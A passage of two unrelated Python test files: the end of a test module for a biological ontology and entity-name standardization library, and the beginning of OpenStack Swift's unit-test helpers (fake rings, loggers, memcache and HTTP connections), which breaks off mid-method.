assert len(mapks) == 12, mapks
ampks = bio_ontology.get_children('FPLX', 'AMPK')
assert len(ampks) == 22, ampks
def test_mtorc_children():
ch1 = bio_ontology.get_children('FPLX', 'mTORC1')
ch2 = bio_ontology.get_children('FPLX', 'mTORC2')
assert ('HGNC', hgnc_client.get_hgnc_id('RICTOR')) not in ch1
assert ('HGNC', hgnc_client.get_hgnc_id('RPTOR')) not in ch2
def test_mtorc_get_parents():
p = bio_ontology.get_parents('HGNC', hgnc_client.get_hgnc_id('RICTOR'))
assert len(p) == 1
assert p == [('FPLX', 'mTORC2')]
def test_mtorc_transitive_closure():
assert bio_ontology.partof('HGNC', hgnc_client.get_hgnc_id('RICTOR'),
'FPLX', 'mTORC2')
assert not bio_ontology.partof('HGNC', hgnc_client.get_hgnc_id('RPTOR'),
'FPLX', 'mTORC2')
def test_erk_isa():
assert bio_ontology.isa('HGNC', '6871', 'FPLX', 'MAPK')
assert not bio_ontology.isa('HGNC', '6871', 'FPLX', 'JNK')
def test_get_parents():
prkaa1 = ('HGNC', '9376')
ampk = ('FPLX', 'AMPK')
p1 = bio_ontology.get_parents(*prkaa1)
assert len(p1) == 8, p1
assert ampk in p1
# FIXME: implement these
# p2 = ent_hierarchy.get_parents(prkaa1, 'immediate')
# assert len(p2) == 7, p2
# This is to make sure we're getting an URI string
# assert unicode_strs(p2)
# assert ampk not in p2
# p3 = ent_hierarchy.get_parents(prkaa1, 'top')
# assert len(p3) == 1, p3
# assert ampk in p3
def test_chebi_isa():
assert bio_ontology.isa('CHEBI', 'CHEBI:87307', 'CHEBI', 'CHEBI:36962')
# FIXME: implement components
# def test_same_components():
# uri_prkag1 = ent_hierarchy.get_uri('HGNC', '9385') # PRKAG1
# uri_ampk = ent_hierarchy.get_uri('FPLX', 'AMPK')
#
# c1 = ent_hierarchy.components[uri_prkag1]
# c2 = ent_hierarchy.components[uri_ampk]
# assert c1 == c2
def test_name_standardize_hgnc_up():
a1 = Agent('x', db_refs={'HGNC': '9387'})
standardize_agent_name(a1, True)
assert a1.name == 'PRKAG3'
a1 = Agent('x', db_refs={'UP': 'Q9UGI9'})
standardize_agent_name(a1, True)
assert a1.name == 'PRKAG3'
a1 = Agent('x', db_refs={'UP': 'Q8BGM7'})
standardize_agent_name(a1, True)
assert a1.name == 'Prkag3'
def test_name_standardize_chebi():
a1 = Agent('x', db_refs={'CHEBI': 'CHEBI:15996'})
standardize_agent_name(a1, False)
assert a1.name == 'GTP'
def test_name_standardize_go():
a1 = Agent('x', db_refs={'GO': 'GO:0006915'})
standardize_agent_name(a1, False)
assert a1.name == 'apoptotic process'
def test_name_standardize_mesh():
a1 = Agent('x', db_refs={'MESH': 'D008545'})
standardize_agent_name(a1, False)
assert a1.name == 'Melanoma', a1.name
def test_name_standardize_mesh_go():
a1 = Agent('x', db_refs={'MESH': 'D058750'})
standardize_agent_name(a1, True)
assert a1.db_refs['GO'] == 'GO:0001837'
assert a1.name == 'epithelial to mesenchymal transition', a1.name
a1 = Agent('x', db_refs={'GO': 'GO:0001837'})
standardize_agent_name(a1, True)
assert a1.db_refs['MESH'] == 'D058750'
assert a1.name == 'epithelial to mesenchymal transition', a1.name
def test_name_standardize_mesh_other_db():
a1 = Agent('x', db_refs={'MESH': 'D001194'})
standardize_agent_name(a1, True)
assert a1.db_refs['CHEBI'] == 'CHEBI:46661'
assert a1.name == 'asbestos', a1.name
db_refs = {'MESH': 'D000067777'}
db_refs = standardize_db_refs(db_refs)
assert db_refs.get('HGNC') == '3313', db_refs
assert db_refs.get('UP') == 'Q12926', db_refs
a2 = Agent('x', db_refs=db_refs)
standardize_agent_name(a2)
assert a2.name == 'ELAVL2'
def test_standardize_db_refs_efo_hp_doid():
refs = standardize_db_refs({'EFO': '0009502'})
assert refs.get('MESH') == 'D000007', refs
refs = standardize_db_refs({'MESH': 'D000007'})
assert refs.get('EFO') == '0009502', refs
refs = standardize_db_refs({'HP': 'HP:0031801'})
assert refs.get('MESH') == 'D064706', refs
refs = standardize_db_refs({'MESH': 'D064706'})
assert refs.get('HP') == 'HP:0031801', refs
# Currently there is no one-to-many mapping in the direction towards MeSH
# (there used to be) if there is again, we should test it here
#refs = standardize_db_refs({'DOID': 'DOID:0060695'})
#assert 'MESH' not in refs
# One-to-many mappings away from MESH
refs = standardize_db_refs({'MESH': 'D000071017'})
assert 'DOID' not in refs
refs = standardize_db_refs({'DOID': 'DOID:0060495'})
assert refs.get('MESH') == 'D000067208'
# This is an xrefs-based mapping that isn't in Gilda's resource file
refs = standardize_db_refs({'EFO': '0000694'})
assert refs.get('MESH') == 'D045169'
def test_standardize_name_efo_hp_doid():
ag = Agent('x', db_refs={'HP': 'HP:0031801'})
standardize_agent_name(ag)
# Name based on MESH mapping
assert ag.name == 'Vocal Cord Dysfunction'
ag = Agent('x', db_refs={'HP': 'HP:0000002'})
standardize_agent_name(ag)
# Name based on HP itself
assert ag.name == 'Abnormality of body height'
ag = Agent('x', db_refs={'DOID': 'DOID:0014667'})
standardize_agent_name(ag)
# Name based on MESH mapping
assert ag.name == 'Metabolic Diseases'
ag = Agent('x', db_refs={'EFO': '1002050'})
standardize_agent_name(ag)
# Name based on MESH mapping
assert ag.name == 'Nephritis', (ag.name, ag.db_refs)
ag = Agent('x', db_refs={'EFO': '0000001'})
standardize_agent_name(ag)
# Name based on EFO itself
assert ag.name == 'experimental factor', (ag.name, ag.db_refs)
def test_standardize_uppro():
ag = Agent('x', db_refs={'UP': 'P01019'})
standardize_agent_name(ag)
assert ag.name == 'AGT'
ag = Agent('x', db_refs={'UPPRO': 'PRO_0000032458'})
standardize_agent_name(ag)
assert ag.name == 'Angiotensin-2', ag.name
ag = Agent('x', db_refs={'UPPRO': 'PRO_0000032458', 'UP': 'P01019'})
standardize_agent_name(ag)
assert ag.name == 'Angiotensin-2', ag.name
def test_uppro_fallback():
# This UP chain has no name currently so we can test that the fallback
# to naming by the UP ID is working
ag = Agent('x', db_refs={'UP': 'Q6IE75', 'UPPRO': 'PRO_0000383648'})
standardize_agent_name(ag)
assert ag.name == 'Bace2'
def test_mirna_standardize():
name, db_refs = standardize_name_db_refs({'HGNC': '31476'})
assert db_refs['HGNC'] == '31476'
assert db_refs['MIRBASE'] == 'MI0000060'
assert name == 'MIRLET7A1'
name, db_refs = standardize_name_db_refs({'MIRBASE': 'MI0001730'})
assert db_refs['MIRBASE'] == 'MI0001730'
assert name == 'mmu-mir-451a'
def test_drugbank_mappings():
name, db_refs = standardize_name_db_refs({'DRUGBANK': 'DB00001'})
assert db_refs.get('CHEBI') == 'CHEBI:142437', db_refs
assert db_refs.get('CHEMBL') == 'CHEMBL1201666', db_refs
assert name == 'lepirudin'
# Here we test for alternative prioritization of name spaces
name, db_refs = standardize_name_db_refs({'DRUGBANK': 'DB00001'},
ns_order=['DRUGBANK', 'CHEBI'])
# We expect to get the Drugbank standard name
assert name == 'Lepirudin'
def test_standardize_up_isoform():
refs = standardize_db_refs({'UP': 'Q99490'})
assert refs == {'UP': 'Q99490', 'HGNC': '16921',
'EGID': '116986'}, refs
refs = standardize_db_refs({'UP': 'Q99490-123'})
assert refs == {'UP': 'Q99490-123', 'HGNC': '16921',
'EGID': '116986'}, refs
def test_standardize_chembl():
db_refs = standardize_db_refs({'DRUGBANK': 'DB00305'})
assert 'CHEMBL' in db_refs, db_refs
assert db_refs['CHEMBL'] == 'CHEMBL105', db_refs
def test_efo_bfo_relations():
assert set(bio_ontology.get_parents('EFO', '0004542')) == \
{('BFO', '0000015'), ('EFO', '0000001')}
def test_name_lookup_obsolete():
# This is a regression test to make sure we don't return another node
# with the same name but which is obsolete (HGNC:11093)
assert bio_ontology.get_id_from_name('HGNC', 'ALDH3A2') == \
('HGNC', '403')
def test_chebi_refinements():
assert bio_ontology.partof('CHEBI', 'CHEBI:136692',
'CHEBI', 'CHEBI:365')
assert not bio_ontology.partof('CHEBI', 'CHEBI:365',
'CHEBI', 'CHEBI:136692')
def test_standardize_hgnc_fplx_mesh_bug():
refs = standardize_db_refs({'HGNC': '1514'})
assert refs['UP'] == 'P41180'
assert 'FPLX' not in refs
refs = standardize_db_refs({'FPLX': 'Calcium_sensing_receptors'})
assert refs['HGNC_GROUP'] == '279'
assert 'HGNC' not in refs
def test_ido_parents():
parents = bio_ontology.get_parents('IDO', '0000514')
assert ('IDO', '0000509') in parents
def test_lspci():
assert bio_ontology.get_name('LSPCI', '18') == 'Pentane-1,5-Diamine'
members = bio_ontology.get_children('LSPCI', '18')
# These are some of the members, not all
expected_members = {('CAS', '462-94-2'),
('CHEBI', 'CHEBI:18127'),
('CHEMBL', 'CHEMBL119296'),
('PUBCHEM', '273')}
assert expected_members < set(members)
def test_nonhuman_entrez():
name, db_refs = standardize_name_db_refs({'EGID': '109880'})
assert name == 'Braf', name
assert db_refs['UP'] == 'P28028', db_refs
def test_pubchem_mesh():
db_refs = standardize_db_refs({'PUBCHEM': '56649450'})
assert db_refs.get('MESH') == 'C585539'
|
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Swift tests """
from __future__ import print_function
import os
import copy
import logging
import errno
from six.moves import range
import sys
from contextlib import contextmanager, closing
from collections import defaultdict, Iterable
import itertools
from numbers import Number
from tempfile import NamedTemporaryFile
import time
import eventlet
from eventlet.green import socket
from tempfile import mkdtemp
from shutil import rmtree
import signal
import json
from swift.common.utils import Timestamp, NOTICE
from test import get_config
from swift.common import utils
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.ring import Ring, RingData
from hashlib import md5
import logging.handlers
from six.moves.http_client import HTTPException
from swift.common import storage_policy
from swift.common.storage_policy import (StoragePolicy, ECStoragePolicy,
VALID_EC_TYPES)
import functools
import six.moves.cPickle as pickle
from gzip import GzipFile
import mock as mocklib
import inspect
from nose import SkipTest
EMPTY_ETAG = md5().hexdigest()
# try not to import this module from swift
if not os.path.basename(sys.argv[0]).startswith('swift'):
# never patch HASH_PATH_SUFFIX AGAIN!
utils.HASH_PATH_SUFFIX = 'endcap'
EC_TYPE_PREFERENCE = [
'liberasurecode_rs_vand',
'jerasure_rs_vand',
]
for eclib_name in EC_TYPE_PREFERENCE:
if eclib_name in VALID_EC_TYPES:
break
else:
raise SystemExit('ERROR: unable to find suitable PyECLib type'
' (none of %r found in %r)' % (
EC_TYPE_PREFERENCE,
VALID_EC_TYPES,
))
DEFAULT_TEST_EC_TYPE = eclib_name
def patch_policies(thing_or_policies=None, legacy_only=False,
with_ec_default=False, fake_ring_args=None):
if isinstance(thing_or_policies, (
Iterable, storage_policy.StoragePolicyCollection)):
return PatchPolicies(thing_or_policies, fake_ring_args=fake_ring_args)
if legacy_only:
default_policies = [
StoragePolicy(0, name='legacy', is_default=True),
]
default_ring_args = [{}]
elif with_ec_default:
default_policies = [
ECStoragePolicy(0, name='ec', is_default=True,
ec_type=DEFAULT_TEST_EC_TYPE, ec_ndata=10,
ec_nparity=4, ec_segment_size=4096),
StoragePolicy(1, name='unu'),
]
default_ring_args = [{'replicas': 14}, {}]
else:
default_policies = [
StoragePolicy(0, name='nulo', is_default=True),
StoragePolicy(1, name='unu'),
]
default_ring_args = [{}, {}]
fake_ring_args = fake_ring_args or default_ring_args
decorator = PatchPolicies(default_policies, fake_ring_args=fake_ring_args)
if not thing_or_policies:
return decorator
else:
# it's a thing, we return the wrapped thing instead of the decorator
return decorator(thing_or_policies)
class PatchPolicies(object):
"""
Why not mock.patch? In my case, when used as a decorator on the class it
seemed to patch setUp at the wrong time (i.e. in setup the global wasn't
patched yet)
"""
def __init__(self, policies, fake_ring_args=None):
if isinstance(policies, storage_policy.StoragePolicyCollection):
self.policies = policies
else:
self.policies = storage_policy.StoragePolicyCollection(policies)
self.fake_ring_args = fake_ring_args or [None] * len(self.policies)
def _setup_rings(self):
"""
Our tests tend to use the policies rings like their own personal
playground - which can be a problem in the particular case of a
patched TestCase class where the FakeRing objects are scoped in the
call to the patch_policies wrapper outside of the TestCase instance
which can lead to some bled state.
To help tests get better isolation without having to think about it,
here we're capturing the args required to *build* a new FakeRing
instances so we can ensure each test method gets a clean ring setup.
The TestCase can always "tweak" these fresh rings in setUp - or if
they'd prefer to get the same "reset" behavior with custom FakeRing's
they can pass in their own fake_ring_args to patch_policies instead of
setting the object_ring on the policy definitions.
"""
for policy, fake_ring_arg in zip(self.policies, self.fake_ring_args):
if fake_ring_arg is not None:
policy.object_ring = FakeRing(**fake_ring_arg)
def __call__(self, thing):
if isinstance(thing, type):
return self._patch_class(thing)
else:
return self._patch_method(thing)
def _patch_class(self, cls):
"""
Creating a new class that inherits from decorated class is the more
common way I've seen class decorators done - but it seems to cause
infinite recursion when super is called from inside methods in the
decorated class.
"""
orig_setUp = cls.setUp
orig_tearDown = cls.tearDown
def setUp(cls_self):
self._orig_POLICIES = storage_policy._POLICIES
if not getattr(cls_self, '_policies_patched', False):
storage_policy._POLICIES = self.policies
self._setup_rings()
cls_self._policies_patched = True
orig_setUp(cls_self)
def tearDown(cls_self):
orig_tearDown(cls_self)
storage_policy._POLICIES = self._orig_POLICIES
cls.setUp = setUp
cls.tearDown = tearDown
return cls
def _patch_method(self, f):
@functools.wraps(f)
def mywrapper(*args, **kwargs):
self._orig_POLICIES = storage_policy._POLICIES
try:
storage_policy._POLICIES = self.policies
self._setup_rings()
return f(*args, **kwargs)
finally:
storage_policy._POLICIES = self._orig_POLICIES
return mywrapper
def __enter__(self):
self._orig_POLICIES = storage_policy._POLICIES
storage_policy._POLICIES = self.policies
def __exit__(self, *args):
storage_policy._POLICIES = self._orig_POLICIES
class FakeRing(Ring):
def __init__(self, replicas=3, max_more_nodes=0, part_power=0,
base_port=1000):
self._base_port = base_port
self.max_more_nodes = max_more_nodes
self._part_shift = 32 - part_power
# 9 total nodes (6 more past the initial 3) is the cap, no matter if
# this is set higher, or R^2 for R replicas
self.set_replicas(replicas)
self._reload()
def _reload(self):
self._rtime = time.time()
def set_replicas(self, replicas):
self.replicas = replicas
self._devs = []
for x in range(self.replicas):
ip = '10.0.0.%s' % x
port = self._base_port + x
# round trip through json to ensure unicode like real rings
self._devs.append(json.loads(json.dumps({
'ip': ip,
'replication_ip': ip,
'port': port,
'replication_port': port,
'device': 'sd' + (chr(ord('a') + x)),
'zone': x % 3,
'region': x % 2,
'id': x,
})))
@property
def replica_count(self):
return self.replicas
def _get_part_nodes(self, part):
return [dict(node, index=i) for i, node in enumerate(list(self._devs))]
def get_more_nodes(self, part):
for x in range(self.replicas, (self.replicas + self.max_more_nodes)):
yield {'ip': '10.0.0.%s' % x,
'replication_ip': '10.0.0.%s' % x,
'port': self._base_port + x,
'replication_port': self._base_port + x,
'device': 'sda',
'zone': x % 3,
'region': x % 2,
'id': x}
def write_fake_ring(path, *devs):
"""
Pretty much just a two node, two replica, 2 part power ring...
"""
dev1 = {'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
'port': 6200}
dev2 = {'id': 0, 'zone': 0, 'device': 'sdb1', 'ip': '127.0.0.1',
'port': 6200}
dev1_updates, dev2_updates = devs or ({}, {})
dev1.update(dev1_updates)
dev2.update(dev2_updates)
replica2part2dev_id = [[0, 1, 0, 1], [1, 0, 1, 0]]
devs = [dev1, dev2]
part_shift = 30
with closing(GzipFile(path, 'wb')) as f:
pickle.dump(RingData(replica2part2dev_id, devs, part_shift), f)
class FabricatedRing(Ring):
"""
When a FakeRing just won't do - you can fabricate one to meet
your tests needs.
"""
def __init__(self, replicas=6, devices=8, nodes=4, port=6200,
part_power=4):
self.devices = devices
self.nodes = nodes
self.port = port
self.replicas = 6
self.part_power = part_power
self._part_shift = 32 - self.part_power
self._reload()
def _reload(self, *args, **kwargs):
self._rtime = time.time() * 2
if hasattr(self, '_replica2part2dev_id'):
return
self._devs = [{
'region': 1,
'zone': 1,
'weight': 1.0,
'id': i,
'device': 'sda%d' % i,
'ip': '10.0.0.%d' % (i % self.nodes),
'replication_ip': '10.0.0.%d' % (i % self.nodes),
'port': self.port,
'replication_port': self.port,
} for i in range(self.devices)]
self._replica2part2dev_id = [
[None] * 2 ** self.part_power
for i in range(self.replicas)
]
dev_ids = itertools.cycle(range(self.devices))
for p in range(2 ** self.part_power):
for r in range(self.replicas):
self._replica2part2dev_id[r][p] = next(dev_ids)
class FakeMemcache(object):
def __init__(self):
self.store = {}
def get(self, key):
return self.store.get(key)
def keys(self):
return self.store.keys()
def set(self, key, value, time=0):
self.store[key] = value
return True
def incr(self, key, time=0):
self.store[key] = self.store.setdefault(key, 0) + 1
return self.store[key]
@contextmanager
def soft_lock(self, key, timeout=0, retries=5):
yield True
def delete(self, key):
try:
del self.store[key]
except Exception:
pass
return True
def readuntil2crlfs(fd):
rv = ''
lc = ''
crlfs = 0
while crlfs < 2:
c = fd.read(1)
if not c:
raise ValueError("didn't get two CRLFs; just got %r" % rv)
rv = rv + c
if c == '\r' and lc != '\n':
crlfs = 0
if lc == '\r' and c == '\n':
crlfs += 1
lc = c
return rv
def connect_tcp(hostport):
rv = socket.socket()
rv.connect(hostport)
return rv
@contextmanager
def tmpfile(content):
with NamedTemporaryFile('w', delete=False) as f:
file_name = f.name
f.write(str(content))
try:
yield file_name
finally:
os.unlink(file_name)
xattr_data = {}
def _get_inode(fd):
if not isinstance(fd, int):
try:
fd = fd.fileno()
except AttributeError:
return os.stat(fd).st_ino
return os.fstat(fd).st_ino
def _setxattr(fd, k, v):
inode = _get_inode(fd)
data = xattr_data.get(inode, {})
data[k] = v
xattr_data[inode] = data
def _getxattr(fd, k):
inode = _get_inode(fd)
data = xattr_data.get(inode, {}).get(k)
if not data:
raise IOError(errno.ENODATA, "Fake IOError")
return data
import xattr
xattr.setxattr = _setxattr
xattr.getxattr = _getxattr
@contextmanager
def temptree(files, contents=''):
# generate enough contents to fill the files
c = len(files)
contents = (list(contents) + [''] * c)[:c]
tempdir = mkdtemp()
for path, content in zip(files, contents):
if os.path.isabs(path):
path = '.' + path
new_path = os.path.join(tempdir, path)
subdir = os.path.dirname(new_path)
if not os.path.exists(subdir):
os.makedirs(subdir)
with open(new_path, 'w') as f:
f.write(str(content))
try:
yield tempdir
finally:
rmtree(tempdir)
def with_tempdir(f):
"""
Decorator to give a single test a tempdir as argument to test method.
"""
@functools.wraps(f)
def wrapped(*args, **kwargs):
tempdir = mkdtemp()
args = list(args)
args.append(tempdir)
try:
return f(*args, **kwargs)
finally:
rmtree(tempdir)
return wrapped
class NullLoggingHandler(logging.Handler):
def emit(self, record):
pass
class UnmockTimeModule(object):
"""
Even if a test mocks time.time - you can restore unmolested behavior in a
another module who imports time directly by monkey patching it's imported
reference to the module with an instance of this class
"""
_orig_time = time.time
def __getattribute__(self, name):
if name == 'time':
return UnmockTimeModule._orig_time
return getattr(time, name)
# logging.LogRecord.__init__ calls time.time
logging.time = UnmockTimeModule()
class WARN_DEPRECATED(Exception):
def __init__(self, msg):
self.msg = msg
print(self.msg)
class FakeLogger(logging.Logger, object):
# a thread safe fake logger
def __init__(self, *args, **kwargs):
self._clear()
self.name = 'swift.unit.fake_logger'
self.level = logging.NOTSET
if 'facility' in kwargs:
self.facility = kwargs['facility']
self.statsd_client = None
self.thread_locals = None
self.parent = None
store_in = {
logging.ERROR: 'error',
logging.WARNING: 'warning',
logging.INFO: 'info',
logging.DEBUG: 'debug',
logging.CRITICAL: 'critical',
NOTICE: 'notice',
}
def warn(self, *args, **kwargs):
raise WARN_DEPRECATED("Deprecated Method warn use warning instead")
def notice(self, msg, *args, **kwargs):
"""
Convenience function for syslog priority LOG_NOTICE. The python
logging lvl is set to 25, just above info. SysLogHandler is
monkey patched to map this log lvl to the LOG_NOTICE syslog
priority.
"""
self.log(NOTICE, msg, *args, **kwargs)
def _log(self, level, msg, *args, **kwargs):
store_name = self.store_in[level]
cargs = [msg]
if any(args):
cargs.extend(args)
captured = dict(kwargs)
if 'exc_info' in kwargs and \
not isinstance(kwargs['exc_info'], tuple):
captured['exc_info'] = sys.exc_info()
self.log_dict[store_name].append((tuple(cargs), captured))
super(FakeLogger, self)._log(level, msg, *args, **kwargs)
def _clear(self):
self.log_dict = defaultdict(list)
self.lines_dict = {'critical': [], 'error': [], 'info': [],
'warning': [], 'debug': [], 'notice': []}
clear = _clear # this is a public interface
def get_lines_for_level(self, level):
if level not in self.lines_dict:
raise KeyError(
"Invalid log level '%s'; valid levels are %s" %
(level,
', '.join("'%s'" % lvl for lvl in sorted(self.lines_dict))))
return self.lines_dict[level]
def all_log_lines(self):
return dict((level, msgs) for level, msgs in self.lines_dict.items()
if len(msgs) > 0)
def _store_in(store_name):
def stub_fn(self, *args, **kwargs):
self.log_dict[store_name].append((args, kwargs))
return stub_fn
# mock out the StatsD logging methods:
update_stats = _store_in('update_stats')
increment = _store_in('increment')
decrement = _store_in('decrement')
timing = _store_in('timing')
timing_since = _store_in('timing_since')
transfer_rate = _store_in('transfer_rate')
set_statsd_prefix = _store_in('set_statsd_prefix')
def get_increments(self):
return [call[0][0] for call in self.log_dict['increment']]
def get_increment_counts(self):
counts = {}
for metric in self.get_increments():
if metric not in counts:
counts[metric] = 0
counts[metric] += 1
return counts
def setFormatter(self, obj):
self.formatter = obj
def close(self):
self._clear()
def set_name(self, name):
# don't touch _handlers
self._name = name
def acquire(self):
pass
def release(self):
pass
def createLock(self):
pass
def emit(self, record):
pass
def _handle(self, record):
try:
line = record.getMessage()
except TypeError:
print('WARNING: unable to format log message %r %% %r' % (
record.msg, record.args))
raise
self.lines_dict[record.levelname.lower()].append(line)
def handle(self, record):
self._handle(record)
def flush(self):
pass
def handleError(self, record):
pass
class DebugSwiftLogFormatter(utils.SwiftLogFormatter):
def format(self, record):
msg = super(DebugSwiftLogFormatter, self).format(record)
return msg.replace('#012', '\n')
class DebugLogger(FakeLogger):
"""A simple stdout logging version of FakeLogger"""
def __init__(self, *args, **kwargs):
FakeLogger.__init__(self, *args, **kwargs)
self.formatter = DebugSwiftLogFormatter(
"%(server)s %(levelname)s: %(message)s")
def handle(self, record):
self._handle(record)
print(self.formatter.format(record))
class DebugLogAdapter(utils.LogAdapter):
def _send_to_logger(name):
def stub_fn(self, *args, **kwargs):
return getattr(self.logger, name)(*args, **kwargs)
return stub_fn
# delegate to FakeLogger's mocks
update_stats = _send_to_logger('update_stats')
increment = _send_to_logger('increment')
decrement = _send_to_logger('decrement')
timing = _send_to_logger('timing')
timing_since = _send_to_logger('timing_since')
transfer_rate = _send_to_logger('transfer_rate')
set_statsd_prefix = _send_to_logger('set_statsd_prefix')
def __getattribute__(self, name):
try:
return object.__getattribute__(self, name)
except AttributeError:
return getattr(self.__dict__['logger'], name)
def debug_logger(name='test'):
"""get a named adapted debug logger"""
return DebugLogAdapter(DebugLogger(), name)
original_syslog_handler = logging.handlers.SysLogHandler
def fake_syslog_handler():
for attr in dir(original_syslog_handler):
if attr.startswith('LOG'):
setattr(FakeLogger, attr,
copy.copy(getattr(logging.handlers.SysLogHandler, attr)))
FakeLogger.priority_map = \
copy.deepcopy(logging.handlers.SysLogHandler.priority_map)
logging.handlers.SysLogHandler = FakeLogger
if utils.config_true_value(
get_config('unit_test').get('fake_syslog', 'False')):
fake_syslog_handler()
class MockTrue(object):
"""
Instances of MockTrue evaluate like True
Any attr accessed on an instance of MockTrue will return a MockTrue
instance. Any method called on an instance of MockTrue will return
a MockTrue instance.
>>> thing = MockTrue()
>>> thing
True
>>> thing == True # True == True
True
>>> thing == False # True == False
False
>>> thing != True # True != True
False
>>> thing != False # True != False
True
>>> thing.attribute
True
>>> thing.method()
True
>>> thing.attribute.method()
True
>>> thing.method().attribute
True
"""
def __getattribute__(self, *args, **kwargs):
return self
def __call__(self, *args, **kwargs):
return self
def __repr__(*args, **kwargs):
return repr(True)
def __eq__(self, other):
return other is True
def __ne__(self, other):
return other is not True
@contextmanager
def mock(update):
returns = []
deletes = []
for key, value in update.items():
imports = key.split('.')
attr = imports.pop(-1)
module = __import__(imports[0], fromlist=imports[1:])
for modname in imports[1:]:
module = getattr(module, modname)
if hasattr(module, attr):
returns.append((module, attr, getattr(module, attr)))
else:
deletes.append((module, attr))
setattr(module, attr, value)
try:
yield True
finally:
for module, attr, value in returns:
setattr(module, attr, value)
for module, attr in deletes:
delattr(module, attr)
class FakeStatus(object):
"""
This will work with our fake_http_connect, if you hand in one of these
instead of a status int or status int tuple to the "codes" iter you can
add some eventlet sleep to the expect and response stages of the
connection.
"""
def __init__(self, status, expect_sleep=None, response_sleep=None):
"""
:param status: the response status int, or a tuple of
([expect_status, ...], response_status)
:param expect_sleep: float, time to eventlet sleep during expect, can
be a iter of floats
:param response_sleep: float, time to eventlet sleep during response
"""
# connect exception
if isinstance(status, (Exception, eventlet.Timeout)):
raise status
if isinstance(status, tuple):
self.expect_status = list(status[:-1])
self.status = status[-1]
self.explicit_expect_list = True
else:
self.expect_status, self.status = ([], status)
self.explicit_expect_list = False
if not self.expect_status:
# when a swift backend service returns a status before reading
# from the body (mostly an error response) eventlet.wsgi will
# respond with that status line immediately instead of 100
# Continue, even if the client sent the Expect 100 header.
# BufferedHttp and the proxy both see these error statuses
# when they call getexpect, so our FakeConn tries to act like
# our backend services and return certain types of responses
# as expect statuses just like a real backend server would do.
if self.status in (507, 412, 409):
self.expect_status = [status]
else:
self.expect_status = [100, 100]
# setup sleep attributes
if not isinstance(expect_sleep, (list, tuple)):
expect_sleep = [expect_sleep] * len(self.expect_status)
self.expect_sleep_list = list(expect_sleep)
while len(self.expect_sleep_list) < len(self.expect_status):
self.expect_sleep_list.append(None)
self.response_sleep = response_sleep
def get_response_status(self):
if self.response_sleep is not None:
eventlet.sleep(self.response_sleep)
if self.expect_status and self.explicit_expect_list:
raise Exception('Test did not consume all fake '
'expect status: %r' % (self.expect_status,))
if isinstance(self.status, (Exception, eventlet.Timeout)):
raise self.status
return self.status
def get_expect_status(self):
expect_sleep = self.expect_sleep_list.pop(0)
if expect_sleep is not None:
eventlet.sleep(expect_sleep)
expect_status = self.expect_status.pop(0)
if isinstance(expect_status, (Exception, eventlet.Timeout)):
raise expect_status
return expect_status
class SlowBody(object):
"""
This will work with our fake_http_connect, if you hand in these
instead of strings it will make reads take longer by the given
amount. It should be a little bit easier to extend than the
current slow kwarg - which inserts whitespace in the response.
Also it should be easy to detect if you have one of these (or a
subclass) for the body inside of FakeConn if we wanted to do
something smarter than just duck-type the str/buffer api
enough to get by.
"""
def __init__(self, body, slowness):
self.body = body
self.slowness = slowness
def slowdown(self):
eventlet.sleep(self.slowness)
def __getitem__(self, s):
return SlowBody(self.body[s], self.slowness)
def __len__(self):
return len(self.body)
def __radd__(self, other):
self.slowdown()
return other + self.body
def fake_http_connect(*code_iter, **kwargs):
class FakeConn(object):
def __init__(self, status, etag=None, body='', timestamp='1',
headers=None, expect_headers=None, connection_id=None,
give_send=None, give_expect=None):
if not isinstance(status, FakeStatus):
status = FakeStatus(status)
self._status = status
self.reason = 'Fake'
self.host = '1.2.3.4'
self.port = '1234'
self.sent = 0
self.received = 0
self.etag = etag
self.body = body
self.headers = headers or {}
self.expect_headers = expect_headers or {}
self.timestamp = timestamp
self.connection_id = connection_id
self.give_send = give_send
self.give_expect = give_expect
self.closed = False
if 'slow' in kwargs and isinstance(kwargs['slow'], list):
try:
self._next_sleep = kwargs['slow'].pop(0)
except IndexError:
self._next_sleep = None
# be nice to trixy bits with node_iter's
eventlet.sleep()
def getresponse(self):
exc = kwargs.get('raise_exc')
if exc:
if isinstance(exc, (Exception, eventlet.Timeout)):
raise exc
raise Exception('test')
if kwargs.get('raise_timeout_exc'):
raise eventlet.Timeout()
self.status = self._status.get_response_status()
return self
def getexpect(self):
if self.give_expect:
self.give_expect(self)
expect_status = self._status.get_expect_status()
headers = dict(self.expect_headers)
if expect_status == 409:
headers['X-Backend-Timestamp'] = self.timestamp
response = FakeConn(expect_status,
timestamp=self.timestamp,
headers=headers)
response.status = expect_status
return response
def getheaders(self):
etag = self.etag
if not etag:
if isinstance(self.body, str):
etag = '"' + md5(self.body).hexdigest() + '"'
else:
etag = '"68b329da9893e34099c7d8ad5cb9c940"'
headers = HeaderKeyDict({
'content-length': len(self.body),
'content-type': 'x-application/test',
'x-timestamp': self.timestamp,
'x-backend-timestamp': self.timestamp,
'last-modified': self.timestamp,
'x-object-meta-test': 'testing',
'x-delete-at': '9876543210',
'etag': etag,
'x-works': 'yes',
})
if self.status // 100 == 2:
headers['x-account-container-count'] = \
kwargs.get('count', 12345)
if not self.timestamp:
# when timestamp is None, HeaderKeyDict raises KeyError
headers.pop('x-timestamp', None)
try:
if next(container_ts_iter) is False:
headers['x-container-timestamp'] = '1'
except StopIteration:
pass
am_slow, value = self.get_slow()
if am_slow:
headers['content-length'] = '4'
headers.update(self.headers)
return headers.items()
def get_slow(self):
if 'slow' in kwargs and isinstance(kwargs['slow'], list):
if self._next_sleep is not None:
return True, self._next_sleep
else:
return False, 0.01
if kwargs.get('slow') and isinstance(kwargs['slow'], Number):
return True, kwargs['slow']
return bool(kwargs.get('slow')), 0.1
def read(self, amt=None):
am_slow, value = self.get_slow()
if am_slow:
if self.sent < 4:
self.sent += 1
eventlet.sleep(value)
return ' '
rv = self.body[:amt]
self.body = self.body[amt:]
return rv
def send(self, data=None):
if self.give_send:
self.give_send(self, data)
am_slow, value = self.get_slow()
if am_slow:
if self.received < 4:
self.received += 1
eventlet.sleep(value)
def getheader(self, name, default=None):
